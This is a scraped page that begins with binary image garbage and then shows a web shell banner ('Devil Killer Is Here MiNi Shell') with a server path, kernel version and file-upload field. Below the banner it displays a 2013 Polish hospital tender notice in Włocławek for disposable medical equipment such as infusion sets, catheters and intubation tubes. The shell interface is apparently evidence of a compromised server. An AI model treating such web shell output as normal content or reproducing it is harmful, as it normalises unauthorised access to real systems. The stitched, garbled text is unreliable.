JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130802/311048-N-2013.html

<p class="kh_header"><b>Włocławek: ZP-16-2013 Dostawa sprzetu jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 311048 - 2013; data zamieszczenia: 02.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny we Włocławku , Ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 412 94 13, faks 54 412 94 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital.wloclawek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP-16-2013 Dostawa sprzetu jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 Aparaty do przetaczania
l.p.	Opis przedmiotu zamówienia	 rozmiar	j.m.	ilość  na 1 rok
1.	Aparaty do infuzji 
	- dł. komory kroplowej 4,5-7 cm
- dren o d. 140-160 cm. 
- op. zbiorcze max. do 400 szt.	szt.
	193000
2.	Aparaty do infuzji bursztynowe
- do przetaczania leków światłoczułych		szt.	400
3.	Strzykawka bursztynowa 50 ml		szt	900
4.	Aparat do transfuzji
	- dł. komory kroplowej 7-10 cm
- dren o d. 140-160 cm
- op. zbiorcze max. do 400 szt.	szt.
	16800

5.	Przedłużacze do pomp infuzyjnych
	- dł. drenu 150 cm
- op. zbiorcze max. do 100 szt.	szt. 	7800
6.	Przedłużacze do pomp infuzyjnych bursztynowe		szt.	300

Zadanie 2 Cewniki, pojemniki na mocz
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Cewnik Foleya dwudrożny
	10 ch/ dł  28cm	szt.	120
		12 ch / dł 40cm	szt.	240
		14 ch / dł 40cm	szt.	360
		16 ch / dł 40cm	szt.	3000
		18 ch / dł 40cm	szt.	4200
		20 ch / dł 40cm	szt.	1200
2	Worki do moczu	2 litrowe	szt.	30000
3	Wieszaki przyłóżkowe do worków moczowych		szt.	700
4	Woreczki do moczu dla noworodków i niemowląt,  dla chłopców 	ok. 100 ml	szt.
	1200
5	Woreczki do moczu dla noworodków i niemowląt, dla dziewczynek,	ok. 100 ml	szt.
	1200
6	Cewnik do odsysania górnych dróg oddechowych
	6 ch	szt.	2400
		8 ch	szt.	2400
		10 ch	szt.	2400
		12 ch	szt.	7200
		14 ch	szt.	21600
		16 ch	szt.	18000
		18 ch	szt.	6000
7	Cewnik do odsysania z lewego oskrzela 	14 ch dł. 60 cm	szt.	3000
8	Cewnik do podawania tlenu przez nos, tzw. nosek
	dł. 140 -150 cm	szt.	4200
		dł. min. 200 cm	szt.	1500
9	Zgłębnik żołądkowo-dwunastniczy 
	16 ch - 5,3 mm	szt.	600
		18 ch - 6.0 mm	szt.	600
		20 Ch- 6,7 mm	szt.	300

Zadanie 3
Drobny sprzęt  medyczny
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Pojemnik z łopatką (do pobierania próbek kału) 
	20 ml	szt.13200 tj.op.	 132
2	Kieliszki do leków wielorazowe 		szt.	1800
3	Kieliszki do leków jednorazowe		szt.	3600
4	Szpatułka drewniana 		op.	150
5	Pojemniki na zużyte igły 	200 ml	szt.	3000
6	Pojemniki na zużyte wenflony	1000 ml	szt.	6000
7	Pojemnik na odpady medyczne	700 ml	szt.	720
8	Zaciskacz do pępowiny 		szt.	1500
9	Opaski identyfikacyjne dla noworodków 
		szt.3000 tj.op.	60
10	Opaski identyfikacyjne dla dorosłych 
		szt.36000 tj.op.720

Zadanie 4 Bielizna i odzież jednorazowego użytku 
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Maski chirurgiczne 3 warstwowe z noskiem		szt.	32400
2	Czepki pielęgniarskie 		szt.	16800
3	Czepki chirurgiczne 		szt.	9600
4	Fartuchy chirurgiczne 		szt.	6720
5	Fartuch przedni z folii		szt.	6000
6	Fartuchy higieniczne dla pacjentów	L	szt.	3600
		XL	szt.	3600
7	Prześcieradła włókninowe 
 - długość i grubość min. 45g/m2 210x130 cm lub większe		szt.	24000
8	Ochraniacze na obuwie		szt.	6000
9	Pościel z fizeliny zielona, jednorazowa (poszwa, poszewka, prześcieradło)		kpl	700
Zadanie 5  Pieluchomajtki, pokrycia higieniczne
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Pieluchomajtki noworodkowe	2-5kg	szt.	4800
2	Pieluchomajtki dziecięce
	5-10kg	szt.	720
		8-12kg	szt.	720
		12-25kg	szt.	1080
3	Pieluchomajtki dla dorosłych
	L	szt.	32400
		XL	szt.	3600
4	Pokrycia higieniczne  w rolce	ok. 50cm x 40 cm	rolki  po 50 m	300
		ok. 60 cm x 50 cm	rolki po 50 m	184

Zadanie 6 Podkłady higieniczne
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Podkład higieniczny
	40x60 cm	szt.	4800
		60x90cm	szt.	14400
2	Podkład higieniczny	80-210cm	szt.	4800
3	Wkłady anatomiczne dla kobiet
	Midi ok. 15 x 33	szt.	16800
		Maxi ok. 20 x 45	szt.	6000
4	Pieluchy anatomiczne	ok. 31 x 62	szt.	3600

Zadanie 7 Elektrody EKG, papier do badań
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Elektrody do EKG piankowe z żelem stałym przeznaczone do  monitorowania  noworodków 	średnica 30mm	szt.
	2400
2	Elektrody do EKG piankowe z żelem stałym  dla dorosłych		szt.
	102000
3	Elektrody do EKG bezcieniowe dla dorosłych, 		szt.
	1320
4	Papier do badań EKG	AsCard A4 - 112x25 ASPEL S	rolki	1440
		Do aparatu GQW 110.2.140	bl.	600
		Life Pack 107,75 x 23	szt.	210
5	Papier USG	UPP - 110 HD 
rolki 110mm x 20m	rolki	250
6	Ręcznik celulozowo-włókninowy bezopyłowy - zalecenia producenta aparatu do USG wys. 23-25 cm, 130m, ok. 300 odc. Waga 2-2,5 kg		rolki	72
7	Papier do KTG	Do aparatu OXFORD SANICAID 143x150x300	bl.	100
		Do aparatu typu SRF 61B++ firmy OXFORD	bl.	30
		Do aparatu monitor COROMETRICS seria 17 firmy OXFORD	bl.	60
Zadanie 8   Filtry antybakteryjne
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Filtr antybakteryjny, antywirusowy do respiratorów		szt.	50
2	Filtr antybakteryjny , antywirusowy do zabiegów operacyjnych	Dla dorosłych	szt	7410
3	Filtr antybakteryjny , antywirusowy do zabiegów operacyjnych	Dla dzieci	szt	600

4	Wymiennik ciepła i wilgoci do rurek tracheotomijnych		szt.	1200

Zadanie 9 Rurki intubacyjne
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Rurki intubacyjne bez mankietu uszczelniającego
	2,0 mm (wew.)	szt.	30
		2,5 mm (wew.)	szt.	30
		3,0 mm (wew.)	szt.	30
		4,0 mm (wew.)	szt.	40
		5,0 mm (wew.)	szt.	110
		5,5 mm (wew.)	szt.	40
		6,0 mm (wew.)	szt.	20
2	Rurki intubacyjne z mankietem uszczelniającym
 	3,0 mm (wew.)	szt.	20
		4,0 mm (wew.)	szt.	110
		4,5 mm (wew.)	szt.	20
		5,0 mm (wew.)	szt.	180
		5,5 mm (wew.)	szt.	150
		6,0 mm (wew.)	szt.	500
		7,0 mm (wew.)	szt.	450
		7,5 mm (wew.)	szt.	10
		8,0 mm (wew.)	szt.	1032
		9,0 mm (wew.)	szt.	1023
3	Rurki intubacyjne zbrojone z mankietem uszczelniającym
	6,0 mm (wew.)	szt.	20
		7,0 mm (wew.)	szt.	6
		8,0 mm (wew.)	szt.	374
		9,0 mm (wew.)	szt.	400
4	Rurki intubacyjne z mankietem uszczelniającym do intubacji przez nos tzw. rurka donosowa
	6,0 mm	szt.	30
		7,0 mm	szt.	30

5	Rurki intubacyjne z mankietem uszczelniającym z odsysaniem z nad mankietu	8,0 mm	szt.	30
		9,0 mm	szt.	30
6	Rurki intubacyjne z mankietem uszczelniającym do przedłużonej  intubacji z odsysaniem znad mankietu	8,0 mm	szt.	10

Zadanie 10 Rurka intubacyjna do terapii  surfaktantem
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Rurki intubacyjne bez mankietu uszczelniającego do terapii surfaktantem 
	2,0 mm (wew.)	szt.	10
		2,5 mm (wew.)	szt.	20
		3,0 mm (wew.)	szt.	25
		3,5 mm (wew.)	szt.	20
		4,0 mm (wew.)	szt.	5

Zadanie 11 Rurki tracheostomijne
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Rurka tracheostomijna z mankietem uszczelniającym
	6,0 mm (wew.)	szt.	10
		7,0 mm (wew.)	szt.	12
		8,0 mm (wew.)	szt.	30
		9,0 mm (wew.)	szt.	10
		10,0 mm (wew.)	szt.	12
2	Rurka tracheostomijna z mankietem uszczelniającym z odsysaniem z nad mankietu
	5,0mm (wew.)	szt.	2
		6,0 mm (wew.)	szt.	2
		7,0 mm (wew.)	szt.	10
		8,0 mm (wew.)	szt.	100
		9,0 mm (wew.)	szt.	100
		10,0 mm (wew.)	szt.	40
3	Rurka tracheotomijna z mankietem uszczelniającym z możliwością regulacji głębokości rurki
	7,0 mm (wew.)	szt.	10
		8,0 mm (wew.)	szt.	20
		9,0 mm (wew.)	szt.	20
		10,0 mm (wew.)	szt.	10
4	Rurka tracheotomijna foniatryczna z mankietem uszczelniającym	8,0 mm (wew.)	szt.	10
		9,0 mm (wew.)	szt.	10
5	Rurka ustno-gardłowa
	0/5 cm	szt.	15
		2/7 cm	szt.	15
		3/8 cm	szt.	275
		4/9 cm	szt.	385
		5/10 cm	szt.	275
6	Prowadnica intubacyjna do ukształtowania drutem
	2 dł. 225 mm	szt.	10
		4 dł. 335 mm	szt.	40
		5 dł. 365 mm	szt.	40
7	Maska krtaniowa z mankietem uszczelniającym
	2,5 dla 20-30 kg	szt.	4
		3 dla 30-50 kg	szt.	35
		4 dla 57-70 kg	szt.	33
		5 powyżej 70 kg	szt.	32
8	Rurka krtaniowa LT-D 
	nr 2 dzieci 12-25 kg	szt.	

120
		nr 2.5 dzieci 125-150cm	szt.	
		nr 3 dorośli <155 cm	szt.	
		nr 4 dorośli 155-180 cm	szt.	
		nr 5 dorośli >180 cm	szt.	

 Zadanie 12 Rurka tracheotomijna z polietylenu
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok
1	Rurka tracheotomijna z polietylenu z otworem / bez otworu
	6,0 mm (wew.)	szt.	5
		7,0 mm (wew.)	szt.	48
		8,0 mm (wew.)	szt.	72
		9,0 mm (wew.)	szt.	17
		10,0 mm (wew.)	szt.	8

Zadanie 13 Igły do znieczuleń

l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość na 1 rok 
1	Igły do znieczuleń podpajęczynówkowych z mandrynem i końcówką standard
	22G 
 dł. 120mm	szt.
	

50
		25G lub 26G
dł.  120mm-130mm	szt.	
		25G 
dł.  88mm-90mm	szt.	50
2	Igły do znieczuleń podpajęczynówkowych ze szlifem  typu Pensil Point pakowana razem z prowadnicą
	27G - dł. ok. 88mm-90mm ze szlifem typu Pencan	szt.	1800
		26G - dł. ok.88mm-90mm ze szlifem typu Pensil point	szt.	800
3	Igła Tuohy do znieczuleń zewnątrzoponowych	18G - dł. ok.88mm-90mm	szt.	20
4	Zestaw do wkłuć centralnych z jednoświatłowym cewnikiem	14G -dł 20cm	szt.	100
		16G - dł 20cm	szt.	30


Zadanie 14 Zestawy do kaniulacji centralnych
l.p.	Opis przedmiotu zamówienia	rozmiar	j.m.	ilość  na 1 rok
1	Zestaw do kaniulacji żył centralnych z antybakteryjnym dwuświatłowym cewnikiem
	7F - dł. 16cm	szt.	30
		7F - dł. 20cm	szt.	30
2	Zestaw do kaniulacji żył centralnych z antybakteryjnym trzyświatłowym cewnikiem	7F dł. 20cm	szt.	30
3	Zestaw do hemofiltracji z dwukanałowym cenikiem silikonowym
 	13,5F - dł. 15cm	szt.	20
		13,5F - dł. 20cm	szt.	30
		13,5F dł. 24cm	szt.	30
4	Zestaw do kaniulacji żył centralnych do hemodializy z cewnikiem trzyświatłowym	12F dł. 20cm	szt.	15.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.41.00-7, 33.19.41.20-3, 33.19.42.00-8, 33.14.12.00-2, 33.14.16.15-4, 33.14.00.00-3, 33.14.98.00-0, 33.17.11.00-0, 33.17.11.10-3, 33.14.13.21-6, 33.14.16.20-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w tym postępowaniu nie będzie wymagał od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonanie  lub wykonywanie w okresie ostatnich trzech lat, a jeżeli okres działalności jest krótszy - w tym okresie- co najmniej 3 dostaw w zakresie dostaw sprzętu  jednorazowego użytku za wartość brutto 50.000,00 zł każda;. co najmniej 3 dostaw w zakresie dostaw sprzętu jednorazowego użytku za wartość brutto 50.000,00 zł każda;.

Zamawiający dokona oceny spełnienia warunku  na podstawie złożonych wraz z ofertą wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w zakresie dostaw sprzętu medycznego jednorazowego użytku w okresie ostatnich trzech lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz z załączeniem dowodów  czy  zostały wykonane lub są wykonywane należycie. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedstawi - co najmniej 3 dostawy w zakresie dostaw sprzętu medycznego jednorazowego użytku za wartość brutto 50.000,00 zł każda  zgodnie  z Załącznikiem nr 5  do niniejszej   specyfikacji;
Każdy warunek zostanie oceniony metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności 
   przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

Celem potwierdzenia, że oferowana usługa odpowiada opisowi przedmiotu zamówienia  Zamawiający żąda:
a. oświadczenia, że oferowany asortyment  spełnia warunki ustawy o wyrobach medycznych z dnia 20 maja  2010r. o  wyrobach medycznych  ( Dz. U. nr 107, poz. 679 ),

b. dla każdego oferowanego wyrobu wymaga się pisemnego potwierdzenia spełnienia wymogów specyfikacji oraz pisemnego ustosunkowania się do wszystkich ocenianych kryteriów w zakresie odpowiednich punktów specyfikacji z 
podaniem dokładnych wartości wszystkich ocenianych parametrów w jednostkach podanych  specyfikacji. Należy także  dostarczyć broszury lub katalogi zawierające szczegółowy opis produktu, w tym wszystkie dane techniczneistotne dla   medycznego zastosowania danego produktu,

c. certyfikatu dopuszczenia wyrobu do obrotu na terenie Unii Europejskiej,

d. deklarację zgodności i oznaczenie znakiem CE,

e. folder handlowy

f. w celu określenia przydatności asortymentu do użycia oraz celem obiektywnego  i  równego traktowania podmiotów  Wykonawca zobowiązany jest  bezpłatnie  dostarczyć  próbki oferowanego asortymentu z   ważnym terminem przydatności  do zużycia (co najmniej 6 m-cy)  w ilościach określonych na formularzu cenowym.

  
Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest do złożenia niżej  wymienionych dokumentów:

a. wypełniony i podpisany Druk ofertowy, zgodnie z  Załącznikiem nr 1 oraz Formularz asortymentowo-cenowy, zgodnie  z Załącznikami nr 1.1.-1.14. do niniejszej  specyfikacji;
b. oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 2 do niniejszej  specyfikacji;
d. informacja o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia, zgodnie z  Załącznikiem  nr 3 ;
e. projekt umowy stanowiący Załącznik nr 4 do niniejszej  specyfikacji;
f. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów rejestracyjnych) w przypadku  podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych ;  
Wszystkie dokumenty muszą być złożone w oryginale lub w postaci kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty.
Jeżeli wykonawca składa dokumenty stanowiące tajemnicę firmy w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji, winny być opatrzone napisem  TAJNE. W tym celu należy również wypełnić Załącznik nr 6 do niniejszej specyfikacji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla stron postanowienia, które zostaną wprowadzone do treści  zawieranej  umowy w sprawie zamówienia publicznego, ogólne   warunki umowy
	
1. Strony przewidują możliwość istotnych zmian umowy w stosunku do treści oferty w przypadku,  gdy:
1)	nastąpi obniżenie ceny;
2)	nastąpi zmiana stawki podatku VAT - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych brutto w przypadku zmiany stawki podatku od towarów i usług VAT. Zmiana cen brutto związana ze zmianą stawki podatku VAT może nastąpić najwcześniej z dniem wejścia w życie aktu prawnego wprowadzającego zmianę stawki podatku VAT, z uwzględnieniem obowiązujących regulacji;
3)	nastąpią zmiany osób wskazanych przez strony do realizacji umowy;
4)	nastąpi zmiana numeru katalogowego nie powodująca zmiany przedmiotu umowy.
